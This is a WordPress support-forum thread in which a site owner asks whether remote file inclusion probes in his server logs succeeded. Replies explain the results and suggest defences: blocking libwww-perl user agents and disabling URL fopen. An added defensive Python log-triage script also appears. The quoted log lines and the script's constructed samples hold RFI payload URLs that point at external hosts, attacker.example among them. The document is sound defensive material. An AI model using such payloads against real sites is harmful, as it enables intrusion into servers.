• Hi, all. I’ve had a bunch of remote file inclusion attempts today – they’ve been hammering away at my domain. I’ve done my best to research the subject but I’m starting from scratch – I knew nothing about it until this evening.

    I’m poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404’s, which I’ve been told probably means that specific attempt was not successful. But in some cases I see something like the following, with a 200 success indication:

    97.106.184.215 – – [29/Apr/2009:20:24:56 -0500] “GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1” 200 7955 “http://blogingenuity.com/2009/04/08/how-to-validating-your…site-the-easy-way-part-2/%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt??” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5”

    I don’t know if this means the attempt was successful and I need to start worrying or what.

    Could anyone who’s experienced this shed some light on:
    1) How can I tell if an attempt was successful and what’s the next step?
    2) How can I best prevent the attacks in the first place

    Thanks in advance.

Viewing 5 replies - 1 through 5 (of 5 total)
  • What do you see when you put that into a browser?

    Thread Starter asechrest

    (@asechrest)

    I get a page not found notice, which I think is good news. But I have hundreds of these today, from what look like a number of different sources. Some of them appear to be trying to load a text file. I have a bunch similar to this:

    209.62.42.242 – – [29/Apr/2009:15:36:49 -0500] “GET /2009/04/08//vwar/backup/errors.php?error=http://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1” 404 40489 “-” “Mozilla/5.0”

    I’ve searched my server filesystem for the text file name and it hasn’t been found. This is also, I think, good news.

    Generally, though, I’m wondering if I can simply determine if they successfully added a page or successfully loaded a file to my server, and if the answer is no to both, can I feel relatively comfortable (not assured, obviously) that the attempts failed?

    I’m researching how to prevent the attempts altogether. I’ve checked my file/folder permissions and they seem to be what’s recommended. I’ve read some suggestions not to use “fopen” but understanding that is a bit above me at the moment.

    Thanks for the response.
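    Added example, not from the thread: a small Python triage script that does what the question above asks. It scans Apache combined-format lines for query parameters carrying a remote URL, in the request line and in the Referer, and says what the status code does and does not tell you about the include. The sample log lines, hosts and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def embedded_urls(target):
    # Query parameters whose value is an absolute URL: the shape of an RFI payload.
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.rstrip("?")  # probes append ?? / ??? to neutralise whatever the script concatenates
        if re.match(r"^(https?|ftp)://", value, re.I):
            hits.append((name, value))
    return hits

def triage(line):
    # One finding dict per line carrying a URL payload; None for ordinary traffic or unparsable lines.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    findings = [(where, name, url)
                for where, target in (("request", rec["uri"]), ("referer", rec["referer"]))
                for name, url in embedded_urls(target)]
    if not findings:
        return None
    status = int(rec["status"])
    if not any(where == "request" for where, _, _ in findings):
        verdict = "payload only in Referer: the status belongs to the file requested, not to an include"
    elif status == 404:
        verdict = "probe hit a script that does not exist; nothing was included"
    elif 200 <= status < 300:
        verdict = "target script exists and answered 2xx: inspect it and the PHP URL-include settings"
    else:
        verdict = "request was refused or errored"
    return {"ip": rec["ip"], "status": status, "findings": findings, "verdict": verdict}

def triage_log(lines):
    return [r for r in map(triage, lines) if r]
# Constructed sample lines modelled on the thread's excerpts; hosts and paths are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Apr/2009:15:36:49 -0500] "GET /2009/04/08//vwar/backup/errors.php'
    '?error=http://attacker.example//id.txt??? HTTP/1.1" 404 40489 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Apr/2009:20:24:56 -0500] "GET /wp-content/plugins/demo/style.css.php'
    '?s=a%7C20 HTTP/1.1" 200 7955 "http://blog.example/errors.php?error=http://attacker.example/c.txt??" "Mozilla/5.0"',
]
```

    Run `triage_log` over your real access log lines; a 2xx on a request whose own query string carries the URL is the case worth investigating, a 404 or a payload that only appears in the Referer is not.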

    They failed.

    What they're trying to load is right here,

    http://www.//sanbokyodan.//fr/editor/xml/copyright.txt

    Link broke.

    One of the easiest ways to thwart a lot (not all, just a lot) of RFI attempts is to disallow any libwww-perl user-agents.

    RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
    RewriteRule ^.*$ - [F]

    That's one way.

    Some will argue with me, but mod_security is also excellent at stopping them.

    Of course, the best way is, yes, to not use fopen. You can disable it in the php.ini.

    Thread Starter asechrest

    (@asechrest)

    Ok, I’ll take a look at implementing those and do some more research to see if not using fopen has any negatives.

    Thanks, whooami.

    Thread Starter asechrest

    (@asechrest)

    For anyone new to RFI who comes across this thread in the future…

    After Whooami’s help and additional research, I wrote up a little beginners guide to tracking and mitigating Remote File Inclusion.

    Constructive criticism or corrections from those more knowledgeable than me are welcome.

  • The topic ‘Remote File Inclusion (RFI) Attempts’ is closed to new replies.